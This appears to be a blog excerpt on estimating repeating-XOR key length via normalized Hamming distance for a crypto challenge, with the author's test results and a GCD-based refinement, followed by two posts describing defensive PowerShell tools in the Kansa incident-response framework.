<span style="font-family: Arial, Helvetica, sans-serif;">If we apply Matasano's algorithm, it's not actually their algorithm, but I'm calling it that here because lazy, we read a couple bytes of our ciphertext, then the next two bytes and get the Hamming Distance. We can repeat this up to the end of the ciphertext and average all the values together, divide by the number of bytes (two initially), that's the "normalization" part. We repeat this for three bytes, then four, then five and so on, up to 14 bytes for this string, since it's length is 28 bytes and we need to difference two strings of bytes.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Let's look at a few examples, I'm going to refer the Hamming Distance as HD, Average Hamming Distance as AvgHD and Normalized Average Hamming Distance as NAvgHD. Let's do some math:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 000:016 004:003 069:017 019:000 027:070 003:024</span><br />
<span style="font-family: "Courier New", Courier, monospace;">HD 004:003 HD 069:017 HD 019:000 HD 027:070 HD 003:024 HD 020:069</span><br />
<span style="font-family: "Courier New", Courier, monospace;">---------- ---------- ---------- ---------- ---------- ----------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 4 4 6 4 7 9</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">If you doubt any of the above is correct, convert the bytes to bits, XOR them against each other and count the 1s:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"> 00000000:00010000 (000:016)</span><br />
<span style="font-family: "Courier New", Courier, monospace;">XOR 00000100:00000011 (004:003)</span><br />
<span style="font-family: "Courier New", Courier, monospace;">-------------------------------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 00000100:00010011 (four ones) for an HD of 4</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">If we keep going like this across the entire 28 byte string, we'll calculate the HD for 14 pairs of bytes, sum up the 14 values and get an AvgHD of 5.61538461538462, divide that by two, because we were using two byte pairs and you get a NAvgHD of 2.80769230769231. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Now we repeat this, but we do it for byte pairs of three bytes each:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"> 000:016:004 003:069:017 019:000:027 003:024:020</span><br />
<span style="font-family: "Courier New", Courier, monospace;">HD 003:069:017 HD 019:000:027 HD 003:024:020 HD 069:017:007</span><br />
<span style="font-family: "Courier New", Courier, monospace;">-------------- -------------- -------------- --------------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 9 6 7 8</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Again all we're doing is XORing together the corresponding pairs, then counting the 1s in the results. If we do this for the first 13 three byte pairs, add up the results and divide by the number of triplet pairs we'll get an AvgHD of 7.625, which is actually slightly higher than the AvgHD we had with our two byte pairs, but we're interested in he NAvgHD, so we divide that number by three, the length of our byte pairs and we get a NAvgHD of 2.54166666666667, which is lower than our NAvgHD for a two byte key.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">We can repeat this process for byte pairs up to a length of 14 bytes, the first half of the ciphertext against the second half. The results look like this:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">CalcKeySize AvgHD NAvgHD<br />----------- ----- ------<br /> 2 5.76923076923077 2.88461538461538<br /> 3 7.625 2.54166666666667<br /> 4 12.3333333333333 3.08333333333333<br /> 5 13.25 2.65<br /> 6 14.6666666666667 2.44444444444444<br /> 7 19.6666666666667 2.80952380952381<br /> 8 22.5 2.8125<br /> 9 20 2.22222222222222<br /> 10 26 2.6<br /> 11 24 2.18181818181818<br /> 12 26 2.16666666666667<br /> 13 34 2.61538461538462<br /> 14 38 2.71428571428571</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Sorted by NAvgHD, because the byte pair size with the smallest NAvgHD is probably our key size shows:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;">CalcKeySize AvgHD NAvgHD<br />----------- ----- ------<br /> <span style="background-color: #b6d7a8;">12</span> 26 2.16666666666667<br /> 11 24 2.18181818181818<br /> <span style="background-color: #b6d7a8;">9</span> 20 2.22222222222222<br /> <span style="background-color: #b6d7a8;">6</span> 14.6666666666667 2.44444444444444<br /> <span style="background-color: yellow;">3 7.625 2.54166666666667</span><br /> 10 26 2.6<br /> 13 34 2.61538461538462<br /> 5 13.25 2.65<br /> 14 38 2.71428571428571<br /> 7 19.6666666666667 2.80952380952381<br /> 8 22.5 2.8125<br /> 2 5.76923076923077 2.88461538461538<br /> 4 12.3333333333333 3.08333333333333</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">But our key was "few," that's three bytes, why isn't it at the top of the list? Matasano's instructions do state the value with the lowest NAvgHD is probably the key size, they don't say it will be the key size. In their example, the value with the lowest NAvgHD is the key size, but in my testing, the NAvgHD is not always the key size, as you can clearly see above. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Let's dive into this a bit more.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The HDs for byte pairs of nine bytes:</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 000:016:004:003:069:017:019:000:027</span><br />
<span style="font-family: "Courier New", Courier, monospace;">HD 070:003:024:020:069:017:007:009:027</span><br />
<span style="font-family: "Courier New", Courier, monospace;">--------------------------------------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 17</span><br />
<span style="font-family: "Courier New", Courier, monospace;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 070:003:024:020:069:017:007:009:027</span><br />
<span style="font-family: "Courier New", Courier, monospace;">HD 015:011:016:070:003:027:009:006:028</span><br />
<span style="font-family: "Courier New", Courier, monospace;">--------------------------------------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 23</span><br />
<span style="font-family: "Courier New", Courier, monospace;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;"> AvgHD: (17 + 23) / 2 = 20</span><br />
<span style="font-family: "Courier New", Courier, monospace;">NAvgHD: 20 / 9 = 2.22222222222222</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">If you compare the AvgHD for smaller key sizes with the AvgHD for the larger key sizes, you'll see the smaller ones have lower AvgHDs, this makes sense if you think about the process of comparing sets of larger numbers with sets of smaller numbers, you're more likely to have larger differences as the upper bound on your numbers increases -- consider the possible differences between numbers 01 and 09 and between 001 and 999.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">What really throws things off is the normalization, when we divide AvgHD by the key size, but you may have noticed that most of the values with lower NAvgHDs are multiples of the actual key size. In my testing across 20+ different plaintext samples, this trend appears again and again when calculating Hamming Distance to find the repeating XOR key size.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Matasano's instructions say, "the KEYSIZE with the smallest normalized edit distance is probably the key." Edit distance is another way of saying Hamming Distance, apparently. They go on to say, "You could proceed perhaps with the smallest 2-3 KEYSIZE values. Or take 4 KEYSIZE blocks instead of 2 and average the distances."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In their example, the key size with the smallest normalized HD is in fact the key, I thought maybe that was because the maximum key size they ask you to try is 40 bytes and the correct key size is not something that divides evenly into 40, but even increasing the maximum key size to a couple multiples over the correct key size does not cause a larger key size to rise to the top, but again, in my tests over 20+ different sample plaintexts encrypted thousands of times with random keys from 2 to 100 bytes, that's the exception.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">For my testing, admittedly limited given the infinite number of possible plaintext messages, I took 20 different samples of text from various sources, blogs, books, both technical and fiction -- most ranging from a paragraph to a page in length, sorry I won't be more precise, again, lazy. I ran these texts through a script that would generate a random key from 2 to 100 bytes in length, random bytes in the range 0x00 through 0xFF, the encrypted text was then passed through the HD algorithm as above and since I knew the actual key size, I set an upper bound on the key sizes I would try to be three times the actual key size. I selected the top five values in terms of lowest NAvgHD for each ciphertext. I ran this test 7758 times.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In 38% of the cases, the key size with the lowest NAvgHD was the correct key size.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In 33% of the cases, the key size with the second lowest NAvgHD was the correct key size.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In 28% of the cases, the key size with the third lowest NAvgHD was the correct key size.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">During my experimentation, the correct key size landed outside of the top three values a few times, but very rarely and I was still tweaking the algorithm to get it correct as I made a fence post error that took me some time to spot and resolve. I'm not counting those values in my final tally. The numbers above are from the last tests I ran after getting all bugs worked out of the algorithm, but your mileage may vary.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Still, I found the above numbers discouraging. If I'm going to write a tool for brute force decrypting XOR encrypted data and the first step in the process is to get the correct key size, I want the algorithm to be more reliable than ~40%. I could do what Matasano suggests and simply try the first three values, but I suspected work could be done to improve this.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">I believe I was right, but again, my sample size is small, but the results across that sample size are promising and the solution was simple, so simple that you've probably already thought of it. I'm sure many others have, but I found no references to it, possibly because search engines fail, or I fail at using them, or because my solution is bogus and just happened to work for my test cases and methodology.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Here's what I did, I saved the top five results -- the five most probable XOR key sizes based on NAvgHD -- then calculated the greatest common denominator (GCD) for the first two key sizes, then the first and third key sizes, then the second and third key sizes. The results were assigned to variables, GCD12, GCD13 and GCD23.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"> If the following conditions are met, GCD12 is returned as the most probable key size: </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<ol><span style="font-family: Arial, Helvetica, sans-serif;">
<li>GCD12 is not one and</li>
<li>GCD12 is a key size in the top n key sizes and</li>
<ol>
<li>GCD12 is equal to GCD13 and GCD23 or</li>
<li>GCD12 is equal to either the first or second most probable key size</li>
<li>If the above conditions are not met, the script returns the key size with the smallest NAvgHD as the most probable key size.</li>
</ol>
</span></ol>
<span style="font-family: Arial, Helvetica, sans-serif;">
</span><span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">How well does this algorithm work? In the testing above, all 7758 cases, I applied this algorithm and the correct key size was returned as the most probable key size 100% of the time.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Recall that in my test script, I'm calculating HDs for all key sizes up to three times the size of the actual key. This does impact the outcome of the script. As a test of this, I changed the script to calculate HDs for all combinations up to four times the actual key size. The results came out as follows across 2574 test runs:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The value with the best NAvgHD was the correct key size 893 times or 34% of the time.<br />The value with the second best NAvgHD was the correct key size 714 times or 27% of the time.<br />The value with the third best NAvgHD was the correct key size 537 times or 20% of the time and the value with the fourth best NAvgHD was the correct key size 430 times or 16% of the time.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">All percentages have been rounded down, stop nitpicking my numbers.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">As you can see increasing the trial key sizes by one more multiple of the actual key size causes the HD algorithm to be come less accurate and unfortunately in real-world cases, we have no knowledge of the actual key size.</span><br />
<span style="font-family: Arial;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">But how did my algorithm enhancements fair in this test run? Out of the 2574 test runs, my script selected the correct key size 2108 times or 81% of the time, not bad, but I believed I could do better. I also wanted to add more sample texts. So I did.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">I downloaded a bunch of English language books from </span><a href="http://www.gutenberg.org/"><span style="font-family: Arial, Helvetica, sans-serif;">http://www.gutenberg.org/</span></a><span style="font-family: Arial, Helvetica, sans-serif;"> and refactored my plaintext function to return random samples from these texts. I did go through each of the files and remove the Project Gutenberg licensing information. I also removed some books that were framed in boxes made up of ASCII characters like pipes, dashes and underlines. I initially ran with these books in, but my numbers were skewed, so I investigated and took them out. I also removed duplicate texts and I only left in a few of the books from the Bible as I thought they may have an undo influence on my results. In the end, I had 80 books total, comprised of 353422 non-blank lines, 3646553 words and 20415200 characters.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">The average input to my XOR encryption was 196 words comprised of 1160 characters.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">For expediency, I reduced the maximum encryption key size to 40 bytes on my initial run. The minimum key size was 2 bytes. The key sizes to be tried was set to 4 times the actual key size and I opted to save the top six most probable key sizes for further review.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">I did make a significant change to the script. In the previous testing, I'd calculated the GCDs for the first three most probable key sizes. I modified the script to calculate the GCDs for every combination of the top n most probable keys. Since I was extracting the top six keys in this run, I was calculating the GCDs for those six key sizes in every possible combination. I also added a parameter for MaxNAvgHD -- the highest NAvgHD I would accept for the probable key size in cases where it could not be clearly determined, the default is 3.5.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">For evaluating the top six (in this case) most probable keys, I put the data through these steps:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<ol><span style="font-family: Arial, Helvetica, sans-serif;">
<li>Calculate the GCDs across every pair of values in the top n values and add them to a hashtable with a count of frequency of occurrence. Each time a given GCD appears, increment its counter in the hashtable.</li>
<li>Get the most frequently occurring GCD (MFGCD) from the hashtable.</li>
<li>If the MFGCD is in the list of the top n most probable key sizes and its NAvgHD is less than the MaxNAvgHD, then return MFGCD as the most Probable Key Size.</li>
</span></ol>
<span style="font-family: Arial, Helvetica, sans-serif;">
</span><span style="font-family: Arial, Helvetica, sans-serif;">If the conditions above are met, the likelihood that MFGCD is the correct key size is high. I haven't done the analysis to see what percentage of cases this is true for, but that analysis could be done. If those conditions are not met, do the following:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<ol><span style="font-family: Arial, Helvetica, sans-serif;">
<li>Take the smaller of the first two most probable key sizes as a possible key size.</li>
<li>Take the most probable key size with the smallest NAvgHD as a possible key size.</li>
<li>If the values from 1 and 2 are the same, return that value as the most probable key size.</li>
<li>If the values from 1 and 2 are not the same, if the first value has a NAvgHD below the MaxNAvgHD, return it as the most probable key size, else return value 2.</li>
</span></ol>
<span style="font-family: Arial, Helvetica, sans-serif;">
</span><span style="font-family: Arial, Helvetica, sans-serif;">This last set of conditions gives more weight to the smaller of the top two values in the list of probable key sizes, but there's no guarantee that the smaller value is more likely to be the correct key size. However, the next step after attempting to calculate the correct key size is to break the encryption via brute force and it's going to be less expensive to try smaller keys than larger ones, so favoring the smaller key size when you're less certain as to the correctness of either key seems like the right thing to do.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Given these changes in my script, what was the outcome? In this test run there were 3897 samples encrypted with random keys from 2 to 40 bytes.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">The script returned the correct key size as the most probable key size 97% of the time.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The key size with the lowest NAvgHD was the correct key size 29% of the time.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Out of the 114 cases where the returned probable key size was not the actual key size, there were 79 cases where the top six most probable key sizes didn't even contain the correct key size. I found this to be the most troubling outcome of my testing, but diving into the data deeper, there was an explanation for 97% of these failures.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">In 77 of these 79 cases, the key was equal to or longer than half the length of the plaintext, meaning the encryption key was not a repeating XOR key at all, some portion of the key may have repeated, but not the entire key. In fact, in 16 cases, the key was longer than the plaintext entirely, meaning the encryption key was effectively a one-time pad.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">In the other two cases, I'm not sure what went wrong. In one, the key size was 14 bytes and the plaintext length was 35 bytes, the value with the lowest NAvgHD was seven and that was the most probable key size as returned by the script. It is a factor of 14, but that's little consolation. According to the output, 12, 11 and 17 all had lower NAvgHDs than 14. In the other failed case, the actual key size was 2 bytes and the plaintext was 2457 bytes in length. The script showed that a key size of three bytes had the lowest NAvgHD with 4, 7, 8, 6 and 5 rounding out the list. Clearly the most common GCD here would be two, but alas two was not in the list of most probable keys and so could not be returned as the most probable key size.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">What of the other 35 cases where the correct key size was in the list of top six probable key sizes, but was not the most probable key size returned by the script? The results came out like this:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;">ActualKeySize ProbableKeySize Top6KeySizes<br />------------- --------------- ------------<br />18 4 18:4:17:22:14:32<br />34 31 34:31:35:30:29:6<br />37 35 37:35:39:17:24:22<br />8 6 8:6:4:3:7:5<br />24 14 24:14:22:10:12:18<br />40 28 40:28:32:35:14:56<br />18 6 18:6:14:22:17:27<br />25 10 50:25:40:11:10:29<br />29 25 29:25:33:8:30:12<br />22 19 22:19:32:36:33:12<br />18 9 36:18:9:27:3:45<br />37 18 37:18:33:39:35:4<br />19 15 19:15:23:32:4:28<br />28 25 28:25:35:19:33:17<br />35 25 35:25:33:15:11:31<br />12 6 24:12:6:30:18:25<br />28 25 28:25:9:32:34:17<br />15 6 15:6:12:18:13:16<br />32 23 32:23:9:54:27:41<br />24 21 24:21:27:35:26:29<br />28 18 28:18:10:19:12:21<br />6 3 6:3:9:8:4:5<br />25 11 25:11:36:16:14:9<br />18 15 18:15:28:25:24:33<br />26 15 26:15:11:8:19:16<br />28 22 28:22:12:7:25:13<br />21 10 21:10:23:31:27:16<br />23 16 23:16:29:31:24:15<br />24 22 24:22:14:11:10:30<br />21 6 42:21:48:55:6:15<br />15 6 15:6:18:9:12:17<br />29 28 29:28:12:14:19:23<br />15 12 15:12:10:4:11:2<br />21 3 21:3:18:9:24:6<br />12 4 12:24:4:8:16:20</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Again, if the scripts most frequently occurring GCD calculations don't point out a clear winner, it puts more weight on smaller probable key sizes that having NAvgHD value below a user supplied threshold with 3.5 being the default value. This could probably use refining, but again, the script has a much higher probability of returning the correct key size (around 97% in my testing) than NAvgHD alone (around 40% or less in my testing).</span><br />
<span style="font-family: Arial;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">It would be easy to have the script return multiple ProbableKeySizes for cases where it can't clearly pick a winner and have that list sorted by key size in ascending order before entering the brute-force decryption phase of its work.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">As I said at the start of this post, I'm a crypto-noob and that's an insult to noobs everywhere. My methods may be fraught with errors and there are lots of smart people in the world who may skim this and laugh, but I wanted to share my analysis and the results because I found it interesting and even fun.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">My code for this is written in PowerShell and is available at </span><a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Test.ps1"><span style="font-family: Arial, Helvetica, sans-serif;">https://github.com/davehull/MCC/blob/master/sets/1/XOR-Test.ps1</span></a><span style="font-family: Arial, Helvetica, sans-serif;">. For testing, I do something like:</span><br />
<span style="font-family: Arial;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;">1..100 | Foreach-Object { .\XOR-Test.ps1 -MinKeySize 2 -MaxKeySize 60 -top 5 -MaxNAvgHD 3.4 | Export-Csv -NoTypeInformation .\output_$_.csv }</span><br />
<span style="font-family: Courier New;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The above will run the script 99 times. It will select some portion of text from text files in .\texts\, sold separately. That text will be encrypted with a random byte key of two bytes on the first pass, that ciphertext string will be passed to the code that attempts to calculate the key size, then the next iteration begins, selecting a new text value, picking a random three byte key and so on, saving the output to CSV files that you can analyze later using Excel or PowerShell.</span><br />
<span style="font-family: Arial;"></span><br />
<span style="font-family: Arial;"><strong>Update</strong>: Running the same analysis again for 60 byte max key size, discarding the cases where the actual key size could not repeat because it was more than half the size of the plaintext, the script returned the correct key size as the most probable key size 99.5% of the time. By comparison, the key size with lowest NAvgHD was the correct key size 31% of the time.</span><br />
<span style="font-family: Arial;"></span><br />
<span style="font-family: Arial;">YMMV.</span>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-6082934905213715052015-03-30T07:30:00.000-07:002015-03-30T07:30:02.268-07:00Kansa: Get-LogparserStack.ps1<a href="https://github.com/davehull/Kansa" target="_blank">Kansa</a> is an incident response framework written in PowerShell, useful for data collection and analysis. Most of the <a href="https://github.com/davehull/Kansa/tree/master/Analysis" target="_blank">analysis</a> capabilities in Kansa require <a href="http://www.microsoft.com/en-us/download/details.aspx?id=24659" target="_blank">Logparser</a>, which is a very handy tool for creating SQL-like queries over data sets that may be comprised of a single file or many files.<br />
<br />
Because adversaries usually want to leave a small footprint, one technique for finding them is frequency analysis -- looking for outliers across many systems. This technique has been <a href="http://digital-forensics.sans.org/blog/2011/04/23/digital-forensics-least-freq-strings" target="_blank">written about before</a>. As such, most of the analysis tools in Kansa are scripts that stack-rank or perform frequency analysis of specific fields in a given data set. Some examples include:<br />
<ul>
<li>Get-ASEPImagePathMD5Stack.ps1</li>
<li>Get-ASEPImagePathLaunchStringMD5UnsignedStack.ps1</li>
<li>Get-ASEPImagePathLaunchStringMD5UnsignedTimeStack.ps1</li>
<li>...</li>
</ul>
And the list goes on. These script names are fairly descriptive, but they are a mouthful and they are not very flexible as they contain hardcoded Logparser queries with set field names.<br />
<br />
Kansa needed a more flexible stack-ranking solution and now it has one.<br />
<br />
Get-LogparserStack.ps1 can be used to perform frequency analysis against any delimited file or set of files, so long as the set all has the same schema and the same header row across each file. Unlike all other Kansa utilities, Get-LogparserStack.ps1 is interactive. After reading the first two lines of each input file and confirming that they all have the same header row, the script prompts the user for the field she wishes to pass to Logparser's COUNT() function, then the script prompts the user for the fields she wishes to GROUP BY.<br />
<br />
Below is a screen shot of the script in action against a small set of Autorunsc data from five systems. The frequency analysis is against the "Image Path" field with both "Image Path" and MD5 being added to the GROUP BY clause. As you can see in the screen shot, the resulting query quickly bubbles up an outlier, a dll from one system does not match the same dll from the other four systems.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXplJ2xsrbGwbWXURi-twJBW2CXsbFu54daUYgj2zHp3Xa3Ke2XeMFvAN2C_2vywMC9xIn3dWy6Mjap5DIlO_81Y-lguRNH40tavmnCWLB6fa8HFAcpmom3U0GZnAR4q7Yl3Zzwdgh0E0/s1600/Get-LogparserStack.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXplJ2xsrbGwbWXURi-twJBW2CXsbFu54daUYgj2zHp3Xa3Ke2XeMFvAN2C_2vywMC9xIn3dWy6Mjap5DIlO_81Y-lguRNH40tavmnCWLB6fa8HFAcpmom3U0GZnAR4q7Yl3Zzwdgh0E0/s1600/Get-LogparserStack.png" height="238" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: Get-Logparser.ps1 quickly shows that one dll is not like the others.</td></tr>
</tbody></table>
Get-LogparserStack.ps1 is a new utility and as such, may mature a bit in time. One potential feature would be to make it non-interactive, so it can be scripted.<br />
<br />
As with nearly all of the scripts that make up Kansa, Get-LogparserStack.ps1 can be used in conjunction with Logparser.exe outside the framework to perform frequency analysis of any data set, providing the schemas match and each file in the set has a header row.<br />
<br />
If you use it and encounter any bugs, please open an issue in <a href="https://github.com/davehull/Kansa" target="_blank">Kansa's GitHub page</a>.<br />
davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-68941534613882421202015-03-25T19:59:00.000-07:002015-03-25T20:01:13.413-07:00Kansa: Get-AutorunscDeep.ps1 -- Taking Autorunsc to 11I wanted to put up a quick post about a new <a href="https://github.com/davehull/Kansa" target="_blank">Kansa</a> collector I recently added -- <a href="https://github.com/davehull/Kansa/blob/master/Modules/ASEP/Get-AutorunscDeep.ps1" target="_blank">Get-AutorunscDeep.ps1</a>. <a href="https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx" target="_blank">Sysinternals' Autoruns</a> is a great utility for finding auto-start extension points in Windows and one <a href="http://www.bing.com/search?q=site%3Atrustedsignal.blogspot.com%20autoruns&qs=n&form=QBRE&pq=site%3Atrustedsignal.blogspot.com%20autoruns&sc=8-40&sp=-1&sk=&cvid=8957e921226d4747bcbf12467e859133" target="_blank">I've blogged about a number of times</a>.<br />
<br />
Kansa has had a collector that wraps around Autorunsc.exe from Sysinternals almost since I began writing Kansa in March of 2014. It's such a great little utility for enumerating so many persistence mechanisms in Windows, though by no means, does it cover all of them.<br />
<br />
Get-AutorunscDeep.ps1 goes to 11. How so? There are two ways that Get-AutorunscDeep.ps1 improves on Autorunsc.exe alone. <br />
<ol>
<li>Get-AutorunscDeep.ps1 includes code written by my friend <a href="https://twitter.com/z4ns4tsu" target="_blank">@z4ns4tsu</a> (who will be speaking at the <a href="http://www.sans.org/event/digital-forensics-summit-2015" target="_blank">SANS 2015 DFIR Summit</a>) that calculates the <a href="http://en.wikipedia.org/wiki/Entropy_(information_theory)" target="_blank">Shannon Entropy</a> of Autorunsc's Image Path property. As many of you well know, packed binaries are common in malware families and those binaries have higher entropy than many legit binaries, so knowing a file's entropy can be a useful lead generation tool when dealing with large amounts of data.</li>
<li>Get-AutorunscDeep.ps1 goes a step further than Autorunsc.exe alone for common interpreters that execute scripts such as cmd.exe, PowerShell.exe or wscript.exe that may call .bat, .ps1 or .vbs files repsectively. Below in Figure 1, I've run the latest version of Autorunsc.exe and saved the output to a csv file, then loaded that csv file into a PowerShell variable called $data, then I'm dumping the contents of $data for any entry that calls a PowerShell script:</li>
</ol>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp7AWKrMba84-Wv93yS8otN65H8AEJHWodrz_-5P8RgZFRfYEITiV7XEayiILiOPfeN7IkMHN6-SL6vLI9twNylMu69ttf96aTncS6-5PP7xHZ27-coTPDLQny9PsuuZZ9tsEJBdmmqYQ/s1600/AutorunscStraight.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp7AWKrMba84-Wv93yS8otN65H8AEJHWodrz_-5P8RgZFRfYEITiV7XEayiILiOPfeN7IkMHN6-SL6vLI9twNylMu69ttf96aTncS6-5PP7xHZ27-coTPDLQny9PsuuZZ9tsEJBdmmqYQ/s1600/AutorunscStraight.PNG" height="232" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: Output of Autorunsc.exe for a PowerShell ASEP (Click to enlarge)</td></tr>
</tbody></table>
Note that in Figure 1, Autorunsc.exe provides hashes of the PowerShell.exe binary itself. I've worked investigations where adversaries have taken existing ASEP entries and modified the scripts that are called, planting their own malicious code in those scripts. If you've got an ASEP that runs via PowerShell, cmd.exe or wscript.exe on hundreds or thousands of hosts and you use Autorunsc.exe to collect that data, a few of the scripts called by that interpreter could have been modified by an attacker and you'd have no visibility into it via Autorunsc.exe alone.<br />
<br />
Get-AutorunscDeep.ps1 solves this problem, in most cases, by adding a hash of the script called by the interpreter. So for ASEPs like cmd.exe, PowerShell.exe and wscript.exe that call scripts, you'll see the hash of the binary itself as Autorunsc.exe calculates it, and you'll get the hash of the script because Get-AutorunscDeep.ps1 will calculate it for you, assuming it can find and read the script. Below in Figure 2, is an example of what this looks like, the data was collected from the same host as above, but remotely using Kansa:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
